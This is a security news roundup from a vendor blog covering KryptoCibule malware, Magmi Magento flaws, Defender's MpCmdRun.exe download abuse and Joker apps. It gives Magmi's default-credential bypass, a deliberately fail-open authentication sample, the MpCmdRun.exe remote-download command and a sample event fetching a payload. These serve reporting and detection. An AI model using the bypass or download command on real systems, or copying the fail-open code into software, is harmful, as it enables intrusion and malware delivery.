KryptoCibule – triple threat / Magento flaws / Joker is back

Welcome to the next episode of the Xopero Security Center! KryptoCibule is a new, 3-in-1 threat for cryptocurrency owners, and it has managed to stay under the radar for almost two years! In the first article of our IT news review, we take a closer look at this malware’s evolution. Ready for more?

New KryptoCibule Windows malware – a triple threat for cryptocurrency users

Threat researchers at ESET discovered a new malware family that is fully focused on getting as much cryptocurrency as possible. Dubbed KryptoCibule, it is “a triple threat”: it uses a victim’s resources to mine virtual coins, it tries to hijack transactions by replacing the wallet address in the clipboard, and it exfiltrates cryptocurrency-related files.

KryptoCibule has managed to stay under the radar for almost two years, and each new version has extended its functionality, as shown in the image below.

Source: ESET

Researchers note that KryptoCibule relies heavily on the Tor network to communicate with its command and control (C2) servers.

It spreads via malicious torrents in archives pretending to be installers for pirated versions of popular software and games. When launching the executable, malware installation starts in the background and the expected routine for the cracked product runs in the foreground.

This trick allowed the malware to avoid attention for so long. Also relevant might be the fact that it seems to target users in the Czech Republic and Slovakia: more than 85% of ESET’s detections are from these countries.

The latest versions of KryptoCibule employ XMRig, an open source program designed to mine Monero using the device’s CPU, as well as kawpowminer, another open source program that mines Ethereum using the GPU. The latter is only used if a dedicated GPU is found on the host, and both programs are set up to connect to an attacker-controlled mining server over the Tor proxy.

Source: ESET

Users should remain vigilant, and the simplest way to avoid a threat like KryptoCibule is to not install pirated software. 


MAGMI Magento plugin flaws allow remote code execution on a vulnerable site

Researchers at Tenable have disclosed two flaws that could enable remote code execution attacks on the Magento Mass Import (Magmi) plugin, an open-source database client that imports data into Magento. A patch has only been published for one of them (CVE-2020-5777), in Magmi version 0.7.24 on Sunday, August 30.

It is hard to say how many Magento sites are vulnerable. However, researchers were able to identify at least 1,500 websites indexed through search engines that use the Magmi plugin, and there are probably more.

Researchers on Tuesday also released proof-of-concept (PoC) exploit code on GitHub for both of the flaws.

The unpatched flaw, CVE-2020-5776, is a cross-site request forgery (CSRF) vulnerability affecting Magmi up to version 0.7.24. In this specific attack, threat actors could trick a Magento administrator into clicking on a link while they are authenticated to Magmi. The attacker could then hijack the administrator’s session, allowing them to execute arbitrary code on the server where Magmi is hosted, researchers said.

The second flaw, CVE-2020-5777, now patched, is an authentication bypass in Magmi version 0.7.23 and below.

Magmi’s authentication process uses HTTP Basic authentication and checks the username and password against the Magento database’s admin_user table. However, if the connection to the Magento database fails, Magmi will accept default credentials, which are magmi:magmi.

“As a consequence, an attacker could force the database connection to fail due to a database denial of service (DB-DoS) attack, then authenticate to Magmi using the default credentials,” said researchers. “The impact of this attack is remote code execution (RCE) on the server where Magmi is hosted.”
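The fail-open pattern behind CVE-2020-5777, shown as an added illustration (constructed code, not Magmi’s own): the vulnerable check falls back to a hard-coded default when the database lookup fails, while the fixed check denies access on any verification error. The admin_user table, its hashing scheme and the account names are assumptions.

```python
# Added illustration of the fail-open authentication described for
# CVE-2020-5777 (constructed, not Magmi's actual code). When the admin_user
# lookup cannot be performed, the vulnerable path accepts a hard-coded
# default, while the fixed path fails closed.
import hashlib
import hmac

DEFAULT_USER = "magmi"
DEFAULT_PASSWORD = "magmi"


class DatabaseUnavailable(Exception):
    """Raised when the Magento database cannot be reached."""


def lookup_admin_hash(username, db_up, admin_table):
    """Simulated admin_user lookup; raises if the database is down."""
    if not db_up:
        raise DatabaseUnavailable("connection refused")
    return admin_table.get(username)


def password_matches(password, stored_hash):
    # Constant-time comparison of a (simulated, unsalted) password hash.
    candidate = hashlib.sha256(password.encode()).hexdigest()
    return hmac.compare_digest(candidate, stored_hash)


def vulnerable_auth(username, password, db_up, admin_table):
    """Fail-open: accepts magmi:magmi whenever the database is unreachable."""
    try:
        stored = lookup_admin_hash(username, db_up, admin_table)
    except DatabaseUnavailable:
        return username == DEFAULT_USER and password == DEFAULT_PASSWORD
    return stored is not None and password_matches(password, stored)


def fixed_auth(username, password, db_up, admin_table):
    """Fail-closed: any error during credential verification denies access."""
    try:
        stored = lookup_admin_hash(username, db_up, admin_table)
    except DatabaseUnavailable:
        return False
    return stored is not None and password_matches(password, stored)


# Constructed admin_user table with a single real account.
ADMIN_TABLE = {"admin": hashlib.sha256(b"correct horse").hexdigest()}
```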

How to reduce the risk in the meantime? It is recommended to disable or uninstall the plugin until the update is available, and to refrain from active web browsing while authenticated to Magmi.


Microsoft Defender can ironically be used to download malware

In a recent Microsoft Defender update, the command-line MpCmdRun.exe tool has been updated to… download malicious files from a remote location.

With this new feature, Microsoft Defender is now part of the long list of Windows programs that can be abused by local attackers.

As discovered by security researcher Mohammad Askar, a recent update to Microsoft Defender’s command-line tool adds a new -DownloadFile command-line argument.

This directive allows a local user to use the Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) to download a file from a remote location using the following command:

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

The good news is that Microsoft Defender will detect malicious files downloaded with MpCmdRun.exe, but it is unknown if other AV software will allow this program to bypass their detections.

With this discovery, administrators and blue teamers now have an additional Windows executable that they need to monitor so that it is not used against them.
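One way to monitor for the usage described above, as an added example that is not part of the original article: detection logic run over constructed process-creation events that flags MpCmdRun.exe launched with -DownloadFile and extracts the URL and parent process for triage. The key="value" event layout and field names are an assumption about the collector’s format.

```python
# Added example (not from the article): flag process-creation events where
# MpCmdRun.exe is invoked with the -DownloadFile argument. The log lines are
# constructed to resemble Sysmon Event ID 1 fields; the layout is an assumption.
import re
from pathlib import PureWindowsPath

# Constructed sample events: a benign signature update, a download, and noise.
SAMPLE_EVENTS = [
    'EventID=1 Image="C:\\Program Files\\Windows Defender\\MpCmdRun.exe" '
    'CommandLine="MpCmdRun.exe -SignatureUpdate" ParentImage="C:\\Windows\\System32\\svchost.exe"',
    'EventID=1 Image="C:\\Program Files\\Windows Defender\\MpCmdRun.exe" '
    'CommandLine="MpCmdRun.exe -DownloadFile -url http://203.0.113.5/payload.bin -path C:\\Users\\Public\\p.bin" '
    'ParentImage="C:\\Windows\\System32\\cmd.exe"',
    'EventID=1 Image="C:\\Windows\\System32\\notepad.exe" CommandLine="notepad.exe" ParentImage="C:\\Windows\\explorer.exe"',
]

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')
URL_RE = re.compile(r"-url\s+(\S+)", re.IGNORECASE)


def parse_event(line):
    """Turn a key="value" event line into a dict; EventID is unquoted."""
    fields = dict(FIELD_RE.findall(line))
    m = re.search(r"EventID=(\d+)", line)
    fields["EventID"] = int(m.group(1)) if m else None
    return fields


def is_mpcmdrun_download(event):
    """True when MpCmdRun.exe runs with -DownloadFile (case-insensitive)."""
    if event.get("EventID") != 1:
        return False
    image = PureWindowsPath(event.get("Image", "")).name.lower()
    cmd = event.get("CommandLine", "").lower()
    return image == "mpcmdrun.exe" and "-downloadfile" in cmd


def find_downloads(lines):
    """Return (parent process name, URL) for each flagged event."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_mpcmdrun_download(ev):
            m = URL_RE.search(ev.get("CommandLine", ""))
            hits.append((PureWindowsPath(ev.get("ParentImage", "")).name,
                         m.group(1) if m else None))
    return hits
```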



Joker spyware plagues more Google Play apps

Google has deleted six apps from its Google Play marketplace that were infecting users with the Joker malware (a.k.a. Bread). 

Together, the apps account for nearly 200,000 installs… and they are still installed on the devices. Users are urged to immediately delete the applications.

The apps found with malware are: Convenient Scanner 2 (100,000 installs), Separate Doc Scanner (50,000 installs), Safety AppLock (10,000 installs), Push Message-Texting & SMS (10,000 installs), Emoji Wallpaper (10,000 installs) and Fingertip GameBox (1,000 installs).

Why so serious? Joker is a billing-fraud family of malware (which researchers categorize as “fleeceware”) that emerged in 2017 but began to ramp up in 2019.

It advertises itself as a legitimate app, but once installed it simulates clicks and intercepts SMS messages to subscribe victims, unbeknownst to them, to unwanted paid premium services.

Google has removed over 1,700 apps containing Joker malware from the Play Store since 2017, but the malware keeps re-emerging.

Users need to leverage not only computer protection (antivirus, backup software) but also mobile security, especially in a time of remote work.


Do you have a thirst for knowledge? There are ten more cybersecurity stories below.

1. Evilnum hackers targeting financial firms with a new Python-based RAT (The Hacker News)
2. Norway’s Parliament, Stortinget, discloses a security breach (Infosecurity)
3. Epic Fail: Emotet malware uses fake ‘Windows 10 Mobile’ attachments (Bleeping Computer)
4. Security flaw allows bypassing PIN verification on Visa contactless payments (We Live Security)
5. Google removes Android app that was used to spy on Belarusian protesters (ZDNet)
6. New Web-Based Credit Card Stealer Uses Telegram Messenger to Exfiltrate Data (The Hacker News)
7. Cisco fixes critical code execution bug in Jabber for Windows (Bleeping Computer)
8. Phishing scam uses Sharepoint and One Note to go after passwords (Naked Security)
9. AlphaBay dark web marketplace moderator gets 11 years in prison (Bleeping Computer)
10. Tor launches membership program to secure finance, boost integration (ZDNet)